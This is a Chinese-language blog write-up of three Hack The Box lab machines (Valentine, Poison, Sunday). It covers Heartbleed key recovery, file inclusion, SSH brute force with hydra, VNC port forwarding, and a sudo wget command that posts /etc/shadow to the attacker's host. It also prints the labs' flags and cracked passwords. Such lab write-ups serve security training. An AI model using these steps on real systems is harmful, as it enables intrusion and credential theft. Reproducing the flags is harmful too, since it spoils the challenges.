HTB-oscplike-valentine+poison+sunday

2024-02-07 15:30

本文主要是介绍HTB-oscplike-valentine+poison+sunday,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

HTB-oscplike-valentine+poison+sunday

Valentine

easy难度的Valentine 靶机IP 10.10.10.79

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.79
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))

dirsearch找到http://10.10.10.79/dev/hype_key有一串十六进制
保存下来 xxd -r -p txt 这里连续的十六进制要加上-p 发现是一段rsa私钥
单凭私钥还不能登录 但是也找不到其他角度了
那么这个莫名其妙的443有没有可能是heartbleed呢
nmap -sV --script=ssl-heartbleed 10.10.10.79 还真是
searchsploit攻击发现了一串text 解码之后是heartbleedbelievethehype
用hype为用户ssh连上去 说我的私钥太open了 可能是open的帅哥就会遇到open的私钥吧
把权限改成400 拿到user的flag e6710a5464769fd5fcd216e076961750

linpeas发现它root执行了tmux 跟着直接执行就root了
f1bb6d759df1f272914ebbc9ed7765b2

请添加图片描述

Poison

medium难度的poison 靶机IP 10.10.10.84

sudo nmap -sC -sV -A -p- -Pn --min-rate=5000 10.10.10.84
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

80进去发现有个框可以查看指定的php文件 但是是可以文件读取的
请添加图片描述

用户是charix 同时在给出的pwdbackup.txt中有一段加密字符说至少加密了十三次
看着就是base64 直接手动嗯解 最后得到Charix!2#4%6&8(0
直接以此ssh连上去 得到user.txt eaacdfb2d141b72a589233063604209c
有一说一越早期的htb机子越给我一种ctf的感觉 现在新的机子感觉比较贴近现实一些

首先看到目录下还有个secret.zip 直接拿上面的密码解开 是一串不知道什么勾八的字符串
提权常规传个linpeas扫扫 看到root执行了Xvnc允许客户端远程连接
那么我们看看监听的是哪个端口netstat -anl 看到一个反常的5901
那么思路就来了 首先把5901映射出来 然后拿secret作为凭据连接vncserver

ssh -L 127.0.0.1:5901:127.0.0.1:5901 charix@10.10.10.84 端口转发
vncviewer -passwd secret 127.0.0.1:5901 连接vnc 拿到root权限看到flag
716d04b188419cf2bb99d891272361f5 打完
请添加图片描述

Sunday

easy难度的sunday 靶机IP 10.10.10.76

79/tcp open finger?
111/tcp open rpcbind 2-4 (RPC #100000)
515/tcp open printer?
6787/tcp open ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
22022/tcp open ssh OpenSSH 7.5 (protocol 2.0)

这都什么勾八端口 finger搜了一下发现是一个查询程序 可以爆破登录
./finger-user-enum.pl -U rockyou.txt -t 10.10.10.76:79
看到用户root sammy sunny
hydra -l sunny -P /usr/share/seclists/Usernames/Names/names.txt -s 22022 10.10.10.76 ssh -f
可以爆破出密码sunday 连上去拿到user的flag
a3d9498027ca5187ba1793943ee8a598

连上去后在根目录看到一个backup文件夹 里面的shadow.backup保存了密码的hash
john爆破后密码是cooldude! 而su sammy后sudo -l 发现root权限执行wget
sudo wget --post-file=/etc/shadow 10.10.14.21:789直接把shadow传过去把root密码爆破了
但是爆破了一会儿我感觉不太对 要是爆破的话第一步就可以直接爆破了
这里可以直接读root.txt 也可以直接把root密码换了再让sammy读回去覆写 都行
拿下root的flag

这篇关于HTB-oscplike-valentine+poison+sunday的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/688140

相关文章

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

HTB-bike(SSTI模版注入)

前言 大家好,我是qmx_07,今天给大家讲解bike靶场 渗透过程 信息搜集 服务器开放了 22 ssh 和 http80端口 Wappalyzer 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等 服务器所使用Express框架 发现SSTI模版注入 可以看到这个输入框,用来输出 内容尝试x

HTB-lgnition(curl工具、yakit、 弱口令)

前言 各位师傅大家好,我是qmx_07,今天来讲解lgnition靶机 渗透流程 信息搜集 服务器开放了80 http端口 curl工具 介绍:curl工具是一个用于发送HTTP请求的命令行工具。它支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,并且支持各种常见的操作,如GET、POST、PUT、DELETE等。 -v显示输出与请求和响应相关的详细信息,包括请求头

HTB-Crocodile(FTP和web综合利用)

前言 各位师傅大家好,今天给大家讲解Crocodile靶机 渗透过程 信息搜集 服务器开放了21FTP和80HTTP服务思路:可以尝试 匿名登录FTP 或者 尝试WEB登录后台 FTP匿名登录 通过anonymous 匿名登录到FTP服务器allowed.userlist 和 allowed.usserlist.pass 分别是 账户和密码 Web目录爆破 服务器有

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca

Valentine's Day Round 1002 Misaki's Kiss again

题意 Misaki's Kiss again Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others) Total Submission(s): 571    Accepted Submission(s): 75 问题描述 摩天轮后,一些朋友希望再次得到Misa

HTB-Redeemer(redis)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Redeemer这台机器,主要是对redis组件进行渗透,了解思路 渗透过程 更改一下 目录结构,先写 渗透过程,再写 题解 信息搜集 通过nmap扫描 发现开启了6379 redis服务,尝试连接注意:nmap 扫描 可以先确定端口开放情况,在进行系统版本扫描,这样会快一些 连接redis数据库 使用redis-cl

webid、sec_poison_id、a1、web_session参数分析与算法实现

文章目录 1. 写在前面2. 参数分析3. 核心算法 【🏠作者主页】:吴秋霖 【💼作者介绍】:擅长爬虫与JS加密逆向分析!Python领域优质创作者、CSDN博客专家、阿里云博客专家、华为云享专家。一路走来长期坚守并致力于Python与爬虫领域研究与开发工作! 【🌟作者推荐】:对爬虫领域以及JS逆向分析感兴趣的朋友可以关注《爬虫JS逆向实战》《深耕爬虫领域》 未来作者会持续

入门三.HTB--Dancing(6.18)

大佬 https://www.cnblogs.com/Hekeats-L/p/16535920.html 任务1 SMB 即Server Message Block(服务器消息块),是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用你的手机、iPad或是另一台电脑来访问A电脑上的该文件时,你可能需要用到SMB共享。 任务2 SMB端口服务 nmap -sV

htb_Freelancer

端口扫描 80 88 389 445 扫描ldap协议相关漏洞,没有发现 扫描子域名,加入/etc/hosts(后面发现没用) 枚举域用户 目录扫描,发现一个/admin目录 访问后发现要账号密码 访问80端口,注册一个freelancer用户 查看Blog,底部评论区可看见有用户 点击用户查看,发现修改url中的数字可以查看不同用户 当url为http://freel